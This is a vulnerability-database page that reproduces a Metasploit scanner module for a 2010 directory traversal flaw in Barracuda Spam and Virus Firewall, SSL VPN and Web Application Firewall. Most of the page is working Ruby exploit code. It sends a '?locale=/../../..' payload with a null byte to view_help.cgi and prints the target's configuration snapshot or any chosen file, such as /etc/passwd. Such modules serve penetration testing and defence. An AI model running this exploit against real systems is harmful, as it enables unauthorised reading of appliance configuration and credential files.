Lucene search
K

Barracuda Multiple Product "locale" Directory Traversal

🗓️ 10 Oct 2010 01:42:26Reported by Tiago Ferreira <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

Barracuda Multiple Product "locale" Directory Traversal vulnerability in Barracuda Spam and Virus Firewall, Barracuda SSL VPN, and Barracuda Web Application Firewall. Attempts to download Barracuda configuration file

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Barracuda Multiple Product "locale" Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability present in
        several Barracuda products, including the Barracuda Spam and Virus Firewall,
        Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,
        this module will attempt to download the Barracuda configuration file.
      },
      'References'     =>
        [
          ['OSVDB', '68301'],
          ['URL', 'https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/'],
          ['EDB', '15130']
        ],
      'Author'         =>
        [
          'Tiago Ferreira <tiago.ccna[at]gmail.com>'
        ],
      'DisclosureDate' => 'Oct 08 2010',
      'License'        =>  MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('FILE', [ true,  "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
        OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
      ])
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    file = datastore['FILE']
    payload = "?locale=/../../../../../../..#{file}%00"

    print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")

    res = send_request_raw(
      {
        'method'  => 'GET',
        'uri'     => uri + payload,
      }, 25)

    if res.nil?
      print_error("#{full_uri} - Connection timed out")
      return
    end

    if (res.code == 200 and res.body)
      if res.body.match(/\<html\>(.*)\<\/html\>/im)
        html = $1

        if res.body =~ /barracuda\.css/
          if html.length > 100
            file_data = html.gsub(%r{</?[^>]+?>}, '')

            print_good("#{full_uri} - Barracuda - Vulnerable")
            print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
          else
            print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
          end
        elsif res.body =~ /help_page/
          print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
        else
          print_error("#{full_uri} - Barracuda - File not found or permission denied")
        end
      else
        print_error("#{full_uri} - Barracuda - No HTML was returned")
      end
    else
      print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
    end

  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
  rescue ::Timeout::Error, ::Errno::EPIPE
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
6.9Medium risk
Vulners AI Score6.9
23